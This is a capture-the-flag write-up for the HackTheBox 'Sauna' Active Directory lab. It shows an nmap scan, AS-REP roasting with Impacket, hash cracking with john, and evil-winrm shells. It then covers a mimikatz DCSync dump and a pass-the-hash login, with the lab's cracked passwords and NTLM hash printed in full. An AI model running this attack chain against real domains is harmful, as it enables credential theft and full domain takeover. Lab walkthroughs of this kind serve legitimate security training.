HackTheBox Sauna writeup

HackTheBox Sauna writeup

Sauna is a great machine for sharpening your Active Directory skills.

To solve this machine, you have to properly enumerate the domain, and with a pinch of OSINT, find the correct username.

The hash for the user might be captured by the AS-REP Roasting attack.

To get the root you have to escalate privileges by stepping aside to another account for the DCSync attack.

The machine itself is pretty similar to the Forest, I tried to use a slightly different toolkit.

Toolkit


Enumeration

Checking all ports with -p- flag:

nmap -sS -sV -p- 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 15:41 EDT
Nmap scan report for htb.local (10.10.10.175)
Host is up (0.022s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-29 02:48:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
64265/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/28%Time=5E7FA986%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.84 seconds

Exploring port 80 you have to find the list of users. That part is a bit CTF-ish, but you need to know the correct username to perform the AS-REP Roasting attack.

Fergus Smith
Shaun Coins
Bowie Taylor
Sophie Driver
Hugo Bear
Steven Kerb

From those names, we're creating a list with common patterns used in AD.

Fergus Smith might be represented as fsmith, or Fergus.Smith, or FerSm, etc.

Exploitation

Firing up the Impacket

python3 GetNPUsers.py GOTISTICAL-BANK.LOCAL/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.175 -no-pass

We go a Kerberos ticket for user fsmith:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:caa59cf44d7cbdadfe91940e4a9433b0$c541f3fb39f017ee166fbb87d5c5c02578c8e9d993b30442f63e5d13be3bbc34e73616ea851a40fbea5ddab5a11ab41c0d3712b73755528fed1ae059e72ea21742e7309540a42d5cbd56fa4fca0d4f69935eadcbcee8bb9a6351cbeb0d27552be9da2e2fd6aa3e3106c4d808c8c5da9e5384f5b59ca907a137e889ae84c8d29a97616c59d8a3f92d2afd738ba2e1896011198eb374dfabfeaa6caa35c3c7b9fb01edaecd52d77e6305896e170c7432b450e799226baa99c23c87ea0c334cbcfb0c9fee5f7217009fb51068d32c94cee0f9ca115045712c9e5abd3d926cb77c25487e617ac09a478195d2f6f20b8264846263cebef81a9248d362eb7497f91a6c

Cracking this hash with john:

john --wordlist=./rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:18 DONE (2020-03-31 10:49) 0.05390g/s 568140p/s 568140c/s 568140C/s Thines..Thehulk2008
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Get the user flag with the Evil-WinRM:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

PrivEsc

One of my new favorite tools can handle the PrivEsc part - WinPEAS Windows Privilege Escalation Awesome Scripts is a part of the toolkit named PEASS - Privilege Escalation Awesome Scripts SUITE

It can be easily imported by Evin-WinRM by upload function or by specifying -e flag when you're starting a shell.

WinPEAS discover some autologon credentials on the machine:

  [+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  35mEGOTISTICALBANK
    DefaultUserName               :  35mEGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Firing up another shell:

evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!

It’s a great chance to try out a mimikatz. And again, -e or upload to pass the exploit to the machine:

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

Mimikatz will return the NTLM hash for user Administrator. The last step is to open another shell as the Administrator. Evil-WinRM have the -H flag, it’s the same as Pass-the-Hash attack:

evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff